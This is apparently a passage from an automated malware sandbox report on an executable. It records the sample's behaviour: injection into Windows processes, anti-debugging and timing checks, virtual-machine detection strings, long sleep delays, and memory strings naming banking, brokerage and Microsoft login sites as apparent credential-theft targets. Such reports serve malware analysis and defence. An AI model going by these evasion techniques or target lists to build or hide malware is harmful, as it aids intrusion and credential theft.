                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Switches to a custom stack to bypass stack traces
                      Source: C:\Windows\SysWOW64\pcaui.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
                      Source: C:\Windows\SysWOW64\pcaui.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
                      Source: C:\Windows\SysWOW64\pcaui.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
                      Source: C:\Windows\SysWOW64\pcaui.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
                      Source: C:\Windows\SysWOW64\pcaui.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
                      Source: C:\Windows\SysWOW64\pcaui.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
                      Source: C:\Windows\SysWOW64\pcaui.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
                      Source: C:\Windows\SysWOW64\pcaui.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeMemory allocated: 1350000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeMemory allocated: 2D10000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeMemory allocated: 4D10000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeMemory allocated: 8EB0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeMemory allocated: 9EB0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeMemory allocated: A0B0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeMemory allocated: B0B0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C096E rdtsc 6_2_058C096E
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6077Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3644Jump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeWindow / User API: threadDelayed 675Jump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeWindow / User API: threadDelayed 9297Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeAPI coverage: 0.7 %
                      Source: C:\Windows\SysWOW64\pcaui.exeAPI coverage: 2.6 %
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe TID: 6292Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3200Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exe TID: 6524Thread sleep count: 675 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exe TID: 6524Thread sleep time: -1350000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exe TID: 6524Thread sleep count: 9297 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exe TID: 6524Thread sleep time: -18594000s >= -30000sJump to behavior
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe TID: 4324Thread sleep time: -70000s >= -30000sJump to behavior
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe TID: 4324Thread sleep count: 33 > 30Jump to behavior
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe TID: 4324Thread sleep time: -49500s >= -30000sJump to behavior
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe TID: 4324Thread sleep count: 34 > 30Jump to behavior
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe TID: 4324Thread sleep time: -34000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\pcaui.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0281C920 FindFirstFileW,FindNextFileW,FindClose,8_2_0281C920
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: 72Z53078.8.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                      Source: 72Z53078.8.drBinary or memory string: discord.comVMware20,11696428655f
                      Source: 72Z53078.8.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                      Source: 72Z53078.8.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                      Source: 72Z53078.8.drBinary or memory string: global block list test formVMware20,11696428655
                      Source: 72Z53078.8.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                      Source: 72Z53078.8.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                      Source: 72Z53078.8.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                      Source: 72Z53078.8.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                      Source: 72Z53078.8.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                      Source: 72Z53078.8.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                      Source: 72Z53078.8.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                      Source: 72Z53078.8.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                      Source: 72Z53078.8.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                      Source: 72Z53078.8.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                      Source: pcaui.exe, 00000008.00000002.4466952395.00000000028FC000.00000004.00000020.00020000.00000000.sdmp, pDqSqZXvqQcT.exe, 0000000A.00000002.4467577983.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000B.00000002.2477219604.000001CE3833C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: 72Z53078.8.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                      Source: 72Z53078.8.drBinary or memory string: outlook.office.comVMware20,11696428655s
                      Source: 72Z53078.8.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                      Source: 72Z53078.8.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                      Source: 72Z53078.8.drBinary or memory string: AMC password management pageVMware20,11696428655
                      Source: 72Z53078.8.drBinary or memory string: tasks.office.comVMware20,11696428655o
                      Source: W3MzrFzSF0.exeBinary or memory string: sqemu
                      Source: 72Z53078.8.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                      Source: 72Z53078.8.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                      Source: 72Z53078.8.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                      Source: 72Z53078.8.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                      Source: 72Z53078.8.drBinary or memory string: dev.azure.comVMware20,11696428655j
                      Source: 72Z53078.8.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                      Source: 72Z53078.8.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                      Source: 72Z53078.8.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                      Source: 72Z53078.8.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                      Source: 72Z53078.8.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C096E rdtsc 6_2_058C096E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_00417983 LdrLoadDll,6_2_00417983
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058B4588 mov eax, dword ptr fs:[00000030h]6_2_058B4588
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05882582 mov eax, dword ptr fs:[00000030h]6_2_05882582
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05882582 mov ecx, dword ptr fs:[00000030h]6_2_05882582
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058BE59C mov eax, dword ptr fs:[00000030h]6_2_058BE59C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_059005A7 mov eax, dword ptr fs:[00000030h]6_2_059005A7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_059005A7 mov eax, dword ptr fs:[00000030h]6_2_059005A7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_059005A7 mov eax, dword ptr fs:[00000030h]6_2_059005A7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058A45B1 mov eax, dword ptr fs:[00000030h]6_2_058A45B1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058A45B1 mov eax, dword ptr fs:[00000030h]6_2_058A45B1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058BE5CF mov eax, dword ptr fs:[00000030h]6_2_058BE5CF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058BE5CF mov eax, dword ptr fs:[00000030h]6_2_058BE5CF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058865D0 mov eax, dword ptr fs:[00000030h]6_2_058865D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058BA5D0 mov eax, dword ptr fs:[00000030h]6_2_058BA5D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058BA5D0 mov eax, dword ptr fs:[00000030h]6_2_058BA5D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058BC5ED mov eax, dword ptr fs:[00000030h]6_2_058BC5ED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058BC5ED mov eax, dword ptr fs:[00000030h]6_2_058BC5ED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058825E0 mov eax, dword ptr fs:[00000030h]6_2_058825E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058AE5E7 mov eax, dword ptr fs:[00000030h]6_2_058AE5E7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058AE5E7 mov eax, dword ptr fs:[00000030h]6_2_058AE5E7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058AE5E7 mov eax, dword ptr fs:[00000030h]6_2_058AE5E7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058AE5E7 mov eax, dword ptr fs:[00000030h]6_2_058AE5E7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058AE5E7 mov eax, dword ptr fs:[00000030h]6_2_058AE5E7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058AE5E7 mov eax, dword ptr fs:[00000030h]6_2_058AE5E7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058AE5E7 mov eax, dword ptr fs:[00000030h]6_2_058AE5E7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058AE5E7 mov eax, dword ptr fs:[00000030h]6_2_058AE5E7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05916500 mov eax, dword ptr fs:[00000030h]6_2_05916500
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05954500 mov eax, dword ptr fs:[00000030h]6_2_05954500
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05954500 mov eax, dword ptr fs:[00000030h]6_2_05954500
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05954500 mov eax, dword ptr fs:[00000030h]6_2_05954500
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05954500 mov eax, dword ptr fs:[00000030h]6_2_05954500
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05954500 mov eax, dword ptr fs:[00000030h]6_2_05954500
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05954500 mov eax, dword ptr fs:[00000030h]6_2_05954500
